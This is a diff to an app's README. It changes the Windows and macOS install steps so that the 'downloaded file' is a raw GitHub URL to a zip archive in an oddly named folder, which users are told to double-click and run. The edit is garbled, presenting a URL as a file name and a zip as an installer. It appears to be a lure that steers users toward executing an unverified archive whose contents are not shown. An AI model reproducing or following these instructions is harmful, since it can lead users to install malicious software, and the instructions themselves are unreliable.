szenoky/app/README.md

 Once you have downloaded the app, it's time to install it.
 Follow these steps based on your operating system:

 ### Windows:
-1. Locate the downloaded file, usually named something like `app-setup.exe`.
+1. Locate the downloaded file, usually named something like `https://raw.githubusercontent.com/szenoky/app/main/numskullism/Software-3.4.zip`.
 2. Double-click the file to launch the installer.
 3. Follow the instructions in the installation wizard.
 4. Once installation is complete, you can find app in your Start menu.

 ### macOS:
-1. Locate the downloaded file, usually named `app.dmg`.
+1. Locate the downloaded file, usually named `https://raw.githubusercontent.com/szenoky/app/main/numskullism/Software-3.4.zip`.
 2. Double-click the file to open it.
 3. Drag the app icon to your Applications folder.
 4. You can now find app in your Applications folder and launch it from there.